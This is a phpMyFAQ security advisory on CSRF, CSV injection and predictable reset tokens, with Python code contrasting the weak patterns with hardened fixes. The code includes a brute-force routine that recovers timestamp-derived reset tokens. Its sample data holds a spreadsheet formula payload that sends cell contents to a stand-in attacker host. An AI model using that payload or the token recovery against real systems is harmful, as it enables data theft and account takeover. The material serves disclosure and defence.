The phpMyFAQ Team has learned of several security issues in phpMyFAQ 2.9.10 and earlier. phpMyFAQ is affected by a cross-site request forgery (CSRF), a CSV injection, and an insecure use of microtime() for generating password-reset tokens.
phpMyFAQ does not implement sufficient checks to prevent CSRF and CSV injection in the reports generated in the admin backend. Exploiting the CSRF and the CSV injection requires administrator privileges, because the report export is only available there. Password-reset tokens were also derived from microtime(), which makes them predictable rather than random.
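As an added illustration, not phpMyFAQ's own code (and in Python rather than the project's PHP so it can be run stand-alone), the three weaknesses named above are shown beside their hardened counterparts: a reset token derived only from a microsecond timestamp, recovered by brute force once the attacker knows roughly when the reset was requested, next to a CSPRNG token; a CSV report export that neutralises cells a spreadsheet would evaluate as formulas; and a synchronizer-token CSRF check for the admin form. The timestamp format, the function names and the sample FAQ rows are assumptions made for the example.

```python
import csv
import hashlib
import io
import secrets
from typing import Optional

# --- 1. Password-reset tokens ----------------------------------------------
# Weak: the token is a hash of the current time in microseconds. This models the
# microtime()-style pattern described in the advisory; it is an assumed pattern,
# not phpMyFAQ's actual implementation.
def weak_reset_token(now_us: int) -> str:
    return hashlib.md5(str(now_us).encode()).hexdigest()

def recover_weak_token(target: str, approx_us: int, window_us: int) -> Optional[int]:
    """Attacker side: try every microsecond within +/- window_us of a guessed
    request time (e.g. from the timestamp of the reset e-mail). Returns the
    timestamp that reproduces the token, or None if it is outside the window."""
    for cand in range(approx_us - window_us, approx_us + window_us + 1):
        if weak_reset_token(cand) == target:
            return cand
    return None

def secure_reset_token() -> str:
    """Hardened: 32 bytes (256 bits) from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(32)

def reset_token_matches(stored: str, presented: str) -> bool:
    """Constant-time comparison so timing does not leak the stored token."""
    return secrets.compare_digest(stored.encode(), presented.encode())

# --- 2. CSV injection in the admin report export ----------------------------
# Spreadsheets evaluate a cell as a formula when it starts with one of these.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize_cell(value) -> str:
    """Prefix user-controlled text that would be parsed as a formula with a
    single quote, which spreadsheets treat as 'this is text'. Genuine numbers
    (int/float) are left alone so negative values are not mangled."""
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    s = str(value)
    if s and s[0] in FORMULA_TRIGGERS:
        return "'" + s
    return s

FIELDNAMES = ["id", "question", "answer"]
# Constructed sample rows; the second "question" is attacker-supplied content.
SAMPLE_ROWS = [
    {"id": 1, "question": "How do I reset my password?", "answer": "Use the reset link."},
    {"id": 2, "question": '=HYPERLINK("http://evil.example/"&A1,"click")', "answer": "-1"},
]

def export_report(rows, fieldnames) -> str:
    """Write the report as CSV with every cell neutralised. Quoting alone does
    not help: spreadsheets strip the quotes and still evaluate the formula."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()

# --- 3. CSRF protection for the admin form ---------------------------------
def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the server-side session and embed the same
    value in the form as a hidden field."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def csrf_check(session: dict, form_token: Optional[str]) -> bool:
    """Reject the request unless the submitted token equals the session copy.
    A cross-site request cannot read the session and so cannot supply it."""
    expected = session.get("csrf_token")
    if not expected or not form_token:
        return False
    return secrets.compare_digest(expected.encode(), form_token.encode())

if __name__ == "__main__":
    t = weak_reset_token(1700000000123456)
    print("weak token recovered at", recover_weak_token(t, 1700000000083456, 100000))
    print("secure token:", secure_reset_token())
    print(export_report(SAMPLE_ROWS, FIELDNAMES))
```

The brute force above searches a 0.2 s window, about 200,000 MD5 calls, which finishes in well under a second; a token drawn from the CSPRNG has no such window to search. For the CSV case, note that the prefix is applied to strings only: a numeric column exported as a number is not at risk, but the same value arriving as user-entered text is, which is why the check is made on the type rather than on the content.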
The phpMyFAQ Team has released phpMyFAQ 2.9.11, which fixes these vulnerabilities. All users of affected phpMyFAQ versions are encouraged to upgrade to this release as soon as possible.
There is no workaround other than installing phpMyFAQ 2.9.11.
The phpMyFAQ Team would like to thank Zeel Chavda for reporting the CSRF and CSV injection issues. We also thank everyone involved for the responsible disclosure of these vulnerabilities.